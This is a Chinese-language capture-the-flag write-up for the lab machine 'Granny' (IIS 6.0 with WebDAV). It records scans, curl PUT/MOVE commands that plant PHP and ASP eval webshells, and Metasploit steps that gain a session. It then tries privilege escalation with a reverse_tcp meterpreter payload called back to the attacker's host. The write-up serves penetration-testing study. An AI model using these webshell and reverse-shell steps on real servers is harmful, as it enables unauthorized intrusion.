Granny(webDAV put+move获取webshell)

10.10.10.15

scan

1
2
3
4
5
6
7
8
80/tcp open  http    Microsoft IIS httpd 6.0

http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unkown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_  Server Date: Mon, 18 Feb 2019 11:05:15 GMT

搜索关键字“WebDAV”,检查一下 “Microsoft IIS WebDAV Write Access Code Execution”

trying1

nikto -h 10.10.10.15

1
2
3
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.

参考资料:https://www.cnblogs.com/cnhacker/p/6999102.html
curl常用方法

创建了1.html,成功
curl -X PUT http://10.10.10.15/1.html -d “abcdef”

准备将php一句话写入1.html,失败

1
2
curl -X PUT http://10.10.10.15/1.html -d "<?php system($_GET['cmd']) ?>"
curl -X MOVE --header 'Destination:http://10.10.10.15/1.html' 'http://10.10.10.15/1.php'

(nikto扫描结果)发现iis 用的是asp,而不是php.

1
2
curl -X PUT http://10.10.10.15/1.html -d " <%eval request("cmd")%> "
curl -X MOVE --header 'Destination:http://10.10.10.15/1.asp' http://10.10.10.15/1.html

msf:获得一个shell

job.rc :

1
2
3
4
use exploit/windows/iis/iis_webdav_upload_asp
set RHOST 10.10.10.15
set LHOST 10.10.14.3
run

msfconsole -r job.rc

info:

Windows Server 2003

1
2
3
4
5
6
7
User accounts for \\GRANNY

-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest                    
IUSR_GRANPA              IWAM_GRANPA              Lakis                    
SUPPORT_388945a0         
The command completed successfully.

尝试提权

exp提权

依次尝试suggerser提示的exp,全部失败

1
2
3
4
5
6
7
8
9
10
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

writeup

之前使用getuid命令,但是结果报错,还以为是权限不够。

msf进程存在于内存之中,以下命令将进程迁移为稳定进程,再使用getuid命令,就不会报错了。

1
2
3
4
5
6
7
8
9
10
background
use post/windows/manage/migrate
set SESSION 1
run

use exploit/windows/local/ppr_flatten_rec
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.7
set LPORT 8899
set SESSION 1

总结

失败的提示

1
2
3
4
5
6
7
8
9
[*] Started reverse TCP handler on 10.10.14.7:8899 
[*] Launching notepad to host the exploit...
[+] Process 208 launched.
[*] Reflectively injecting the exploit DLL into 208...
[*] Injecting exploit into 208 ...
[*] Exploit injected. Injecting payload into 208...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...
[*] Exploit completed, but no session was created.

waiting 30 sec,当看到这个提示,于是执行失败以后,输入以下命令。

1
set wait 20